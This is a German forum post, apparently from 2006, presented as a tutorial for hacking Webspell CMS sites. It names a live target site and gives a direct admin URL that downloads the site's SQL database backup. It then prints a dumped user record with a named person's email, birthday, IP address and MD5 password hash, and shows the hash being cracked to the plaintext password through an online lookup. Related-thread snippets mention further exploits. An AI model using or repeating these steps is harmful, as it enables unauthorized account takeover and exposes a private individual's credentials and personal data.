Vollständige Version anzeigen : [Hacking] Webspell: Admin Passwörter hacken


Mr_MeYa
02.11.2006, 22:43

ier mal ein Tutorial wie man Webspell hackt ;)

Also als erstes nehmen wir uns mal eine Seite die auf Webspell läuft. Ich habe mir diese hier genommen.
(;goeclan;go;funpic~de/tesports/index;php?site=news)

Nun fügen wir anstatt des
/index;php?site=news wir dort nun:
/admin/database;php?action=write&userID=1 ein.
Danach sieht das ganze so aus: ;goeclan;go;funpic~de/tesports/admin/database;php?action=write&userID=1 (;goeclan;go;funpic~de/tesports/admin/database;php?action=write&userID=1)
Wenn diese Adresse nun bestätigt müsste ein Downloadfenster mit der Meldung das eine Backup;sql geladen werden soll. Die Organisiert ihr euch auch.

Nun nehmt ihr einen Editor unserer wahl, zB. Notepad++. Dort sucht ihr nach diesen Einträgen (Normalerweise sind dort mehr, hab zur veranschauligung nur einen genommen):
INSERT INTO `webs_user` (`userID`, `registerdate`, `lastlogin`, `username`, `password`, `nickname`, `email`, `firstname`, `lastname`, `;`, `country`, `town`, `birthday`, `icq`, `avatar`, `usertext`, `userpic`, `clantag`, `clanname`, `clanhp`, `clanirc`, `clanhistory`, `cpu`, `mainboard`, `ram`, `monitor`, `graphiccard`, `soundcard`, `verbindung`, `keyboard`, `mouse`, `mousepad`, `newsletter`, `homepage`, `about`, `pmgot`, `pmsent`, `visits`, `banned`, `ip`, `topics`, `articles`, `demos`, `files`, `gallery_pictures`, `mailonpm`, `userdescription`, `activated`) VALUES ('4', '1161426312', '1162375788', 'Christophgoe', 'f2a0ffe83ec8d44f2be4b624b0f47dde', 'FoX', 'Johanna;Wiedemann;t-online;de', 'Chris', '', 'm', 'de', '..;', '1991-03-18 00:00:00', '204-282-537v', '', '', '4;jpg', 'Ť-ę;ﮜρořŤﻜ', 'Ť-ę;ﮜρořŤﻜ', ';;;t-e;sports;de~vu/', 'n/a', '-=STF=- BH ...;', '3;0', 'kA', '512 DDR', '15° TfT', '', 'On board', 'Dls 1000', 'Medion', 'Medion', 'Speedpad', '1', ';;;t-e;sports;de~vu/', '', '22', '0', '4', '0', '217;238;24;98', '', '', '', '', '', '0', '', '1');

Nun haben wir schonmal einen MD5-Hash und einen Login-Namen.
Loginname: Christophgoe.
MD5-Hash: f2a0ffe83ec8d44f2be4b624b0f47dde

Nun nehmen wir einen MD5 reverse lookup. Ich habe diesen hier genommen: (;nz;md5;crysm~net/) ihr könnt aber auch diesen nehmen: md5cracker~de - de beste bron van informatie over md5cracker. Deze website is te koop! (;;;md5cracker~de)

Dort gebt ihr nun den MD5-Hash ein. Und es wird ausgegeben das es "hans" heißt.

Also das Passwort ist hans und der Loginname ist Christophgoe.

Das wars schon.

HF und GL.
Mr_MeYa

Hardware Preisvergleich | Amazon Blitzangebote!

Videos zum Thema
Video Loading...
Ähnliche Themen zu [Hacking] Webspell: Admin Passwörter hacken
  • [Hacking] XXX Passwörter scannen
    Gutes Tutorial zum Thema ; Passwörter scannen. Das Video findet man auch auf yt. [...]

  • Webspell hacking!!
    Mein Clan hat ne Clan Seite, die wurde gehackt, als CMS ist webspell drauf. Jetzt wollte ich mal fragen wie ich sie zurück hacken kann. das mit dem trick: admin/database;php?action=write&userID=1 klappt nicht. Das ftp passwort wurde auch gehackt , eher das passwort vom webspell. E-Mail wurde [...]

  • [Hacking] Webspell ganz einfach via Exploit hacken
    Webspell hacken via Exploit Das Exploit: # WebSPELL <= 4;01;02 (picture;php) Remote File Disclosure Vulnerability # Discovered by: Trex # Visit: ;;Trex-Online~net / ;;UnderGround~ag # Comment: Happy easter! # # ___ ___ # / \ / \ ___________________________ # / / \_ [...]

  • [Hacking] Webspell hacken
    So, in diesem Tutorial werde ich euch zeigen, wie man ganz leicht eine Webspell Website hackt. Doch zuerst, was ist eigentlich Webspell? Unter Webspell versteht man ein sehr bekanntes Content-Management-System(kurz: CMS). Doch was ist jetzt wieder ein CMS? -> Content-Management-System – Wikipedia [...]



raid-rush.ws | Imprint & Contact pr